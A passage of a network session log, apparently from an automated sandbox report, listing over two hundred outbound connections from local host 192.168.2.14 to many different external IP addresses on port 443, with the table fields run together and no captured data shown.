                                      21865192.168.2.1450230184.28.159.206443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21866192.168.2.144558827.96.19.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21867192.168.2.143517027.246.76.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21868192.168.2.1434400203.141.134.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21869192.168.2.143699490.67.141.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21870192.168.2.145647674.160.121.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21871192.168.2.1447384209.18.47.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21872192.168.2.1445196173.219.211.101443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21873192.168.2.1455182143.90.21.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21874192.168.2.144293690.89.156.247443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21875192.168.2.1458974222.79.196.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21876192.168.2.143624043.209.120.168443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21877192.168.2.1435248117.63.185.163443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21878192.168.2.144068231.120.48.98443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21879192.168.2.1452578113.173.204.239443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21880192.168.2.1459564129.82.113.133443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21881192.168.2.1457488194.166.52.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21882192.168.2.1446522170.222.100.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21883192.168.2.145837466.230.9.202443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21884192.168.2.144916466.226.35.7443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21885192.168.2.1444618205.162.63.16443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21886192.168.2.143963645.29.227.18443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21887192.168.2.143453049.78.123.60443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21888192.168.2.143387066.119.157.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21889192.168.2.1434604118.203.56.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21890192.168.2.1444312114.74.221.196443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21891192.168.2.1453908137.47.253.2443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21892192.168.2.14599149.197.183.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21893192.168.2.1456946201.1.79.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21894192.168.2.1448854211.190.102.237443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21895192.168.2.1442034188.10.69.128443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21896192.168.2.1449948156.94.208.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21897192.168.2.145761650.100.111.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21898192.168.2.1445712208.75.1.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21899192.168.2.1458132223.7.62.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21900192.168.2.145334042.196.23.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21901192.168.2.1447580168.99.194.217443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21902192.168.2.1454624159.164.63.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21903192.168.2.1457802102.228.35.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21904192.168.2.1451196134.30.241.169443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21905192.168.2.1454032216.211.216.42443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21906192.168.2.1438544110.222.138.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21907192.168.2.1455494140.154.82.72443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21908192.168.2.1439602149.185.80.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21909192.168.2.1455272126.72.206.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21910192.168.2.1449674160.120.240.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21911192.168.2.145255080.145.113.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21912192.168.2.1438196143.90.77.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21913192.168.2.144025254.240.193.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21914192.168.2.1447730136.133.144.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21915192.168.2.1458568184.151.55.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21916192.168.2.144990898.208.76.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21917192.168.2.1459936195.134.225.100443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21918192.168.2.144534475.236.230.32443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21919192.168.2.1442274132.252.96.172443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21920192.168.2.1435044192.72.3.204443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21921192.168.2.144847482.153.176.39443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21922192.168.2.143793450.122.230.209443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21923192.168.2.144071818.40.142.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21924192.168.2.1441414156.12.254.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21925192.168.2.144018477.237.23.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21926192.168.2.1443122121.228.135.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21927192.168.2.1438874124.229.90.96443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21928192.168.2.1453860134.195.137.67443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21929192.168.2.143840487.185.197.108443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21930192.168.2.1441262124.211.208.232443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21931192.168.2.1433316204.123.41.164443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21932192.168.2.1450030158.187.169.106443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21933192.168.2.1446930186.165.191.175443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21934192.168.2.1449398120.187.65.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21935192.168.2.1433408112.220.231.30443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21936192.168.2.1433212221.225.10.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21937192.168.2.1451928198.42.72.70443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21938192.168.2.1459770137.157.127.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21939192.168.2.144255898.191.60.225443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21940192.168.2.1445194115.171.103.219443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21941192.168.2.1445998165.159.30.20443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21942192.168.2.145328220.97.91.11443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21943192.168.2.143540497.86.237.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21944192.168.2.145722470.188.172.84443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21945192.168.2.1450074125.250.34.200443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21946192.168.2.14589582.240.26.92443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21947192.168.2.1457642205.125.223.181443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21948192.168.2.1447216130.167.173.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21949192.168.2.1434568203.252.25.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21950192.168.2.1453496118.98.18.255443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21951192.168.2.1432794205.219.193.111443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21952192.168.2.1451498199.34.204.243443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21953192.168.2.144930284.24.99.52443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21954192.168.2.1443530136.119.214.142443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21955192.168.2.1446618125.40.169.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21956192.168.2.144554251.186.145.54443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21957192.168.2.144090275.229.207.216443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21958192.168.2.145111457.216.6.241443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21959192.168.2.144048261.225.4.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21960192.168.2.1439678123.127.174.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21961192.168.2.146027281.31.106.118443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21962192.168.2.1442656164.216.90.131443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21963192.168.2.145889435.253.130.234443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21964192.168.2.1460910162.14.130.137443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21965192.168.2.144862090.12.100.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21966192.168.2.1449962198.244.97.135443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21967192.168.2.144561812.135.239.138443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21968192.168.2.1449378143.105.117.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21969192.168.2.1436026199.150.111.95443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21970192.168.2.1451378208.169.44.4443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21971192.168.2.143442899.250.35.148443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21972192.168.2.1435254184.81.34.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21973192.168.2.145599466.154.134.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21974192.168.2.145381074.146.141.246443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21975192.168.2.1449244117.209.54.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21976192.168.2.1449084217.252.36.134443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21977192.168.2.1444612152.70.195.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21978192.168.2.144827044.237.168.31443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21979192.168.2.1452148145.198.233.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21980192.168.2.144599293.24.15.186443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21981192.168.2.1442526112.45.50.166443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21982192.168.2.1460864131.140.194.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21983192.168.2.1447880110.84.97.180443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21984192.168.2.1437336217.231.153.233443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21985192.168.2.1439978197.14.134.86443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21986192.168.2.1455858199.171.108.191443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21987192.168.2.1433494118.30.195.230443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21988192.168.2.1457850221.59.21.197443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21989192.168.2.145160477.92.125.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21990192.168.2.145819466.196.244.61443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21991192.168.2.143686874.31.89.156443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21992192.168.2.1449816191.202.218.57443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21993192.168.2.1457944126.134.71.189443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21994192.168.2.1458560139.1.227.229443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21995192.168.2.1443416114.166.204.94443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21996192.168.2.143337219.128.8.36443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21997192.168.2.1452064203.71.52.129443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21998192.168.2.1454168144.168.229.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      21999192.168.2.1441512124.235.147.190443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22000192.168.2.1437558165.65.85.165443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22001192.168.2.1445520136.244.126.17443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22002192.168.2.1433398199.47.152.238443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22003192.168.2.143357470.113.20.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22004192.168.2.1433466162.78.100.123443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22005192.168.2.145483499.127.49.63443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22006192.168.2.1436402181.15.59.223443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22007192.168.2.1439324105.82.151.80443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22008192.168.2.1452178149.140.101.188443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22009192.168.2.1447894168.63.197.35443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22010192.168.2.14557429.252.58.43443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22011192.168.2.144653293.26.44.50443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22012192.168.2.144516274.219.241.150443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22013192.168.2.143570062.22.93.14443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22014192.168.2.145273837.163.160.107443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22015192.168.2.1437686116.159.159.89443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22016192.168.2.144179648.15.245.221443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22017192.168.2.144099031.53.3.130443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22018192.168.2.1446268196.18.146.203443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22019192.168.2.144110298.147.105.187443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22020192.168.2.1457740143.74.221.198443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22021192.168.2.145368827.219.227.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22022192.168.2.144485287.150.75.160443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22023192.168.2.144873235.108.98.161443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22024192.168.2.1436158193.111.32.184443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22025192.168.2.1453136134.170.52.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22026192.168.2.1433352157.167.39.174443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22027192.168.2.1447966110.103.15.124443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22028192.168.2.1451780104.160.117.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22029192.168.2.1460540163.57.33.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22030192.168.2.1459336168.61.92.215443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22031192.168.2.1439928162.178.117.22443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22032192.168.2.1444482153.212.19.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22033192.168.2.1433906208.33.207.157443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22034192.168.2.1459296103.74.223.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22035192.168.2.144852695.229.152.218443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22036192.168.2.145771878.80.49.182443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22037192.168.2.1439426104.197.37.121443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22038192.168.2.144508675.102.155.25443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22039192.168.2.145012852.36.227.73443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22040192.168.2.1445992220.193.254.210443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22041192.168.2.143741660.238.195.122443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22042192.168.2.145564219.192.204.211443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22043192.168.2.145519065.10.166.69443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22044192.168.2.1449454140.39.223.146443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22045192.168.2.1432846124.187.241.78443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22046192.168.2.145511641.191.86.74443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22047192.168.2.145863652.125.77.249443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22048192.168.2.143344446.95.15.47443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22049192.168.2.1443758126.155.234.59443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22050192.168.2.1446262186.69.133.194443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22051192.168.2.1440316109.240.61.205443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22052192.168.2.144151237.138.132.104443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22053192.168.2.145690424.72.124.105443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22054192.168.2.1449714140.165.238.185443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22055192.168.2.145372431.157.65.176443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22056192.168.2.145643261.58.42.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22057192.168.2.1445910166.112.114.167443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22058192.168.2.1437360166.117.24.208443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22059192.168.2.1452906168.104.36.5443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22060192.168.2.1454836159.204.122.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22061192.168.2.145751052.167.237.58443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22062192.168.2.1435514204.61.21.152443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22063192.168.2.145604625.122.137.222443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22064192.168.2.1439344164.86.19.46443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22065192.168.2.1438340163.177.144.19443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22066192.168.2.143791067.227.61.236443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22067192.168.2.1453690213.144.49.45443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22068192.168.2.1447128152.38.229.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22069192.168.2.1439366129.159.19.178443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22070192.168.2.144659470.138.163.26443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22071192.168.2.1457928171.115.194.244443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22072192.168.2.1445844190.58.246.113443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22073192.168.2.144722054.171.237.235443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22074192.168.2.143460653.119.76.231443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22075192.168.2.14564308.132.239.23443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22076192.168.2.1453712154.153.96.64443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22077192.168.2.145583018.194.129.6443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22078192.168.2.1459628218.77.27.177443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22079192.168.2.1438862223.82.99.145443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22080192.168.2.1456360171.169.232.132443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22081192.168.2.145459034.213.167.151443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22082192.168.2.144049446.11.29.120443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22083192.168.2.145648227.104.235.91443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22084192.168.2.143738688.84.162.155443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22085192.168.2.145522452.44.28.12443
                                      TimestampBytes transferredDirectionData


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      22086192.168.2.1443134151.64.29.160443
                                      TimestampBytes transferredDirectionData


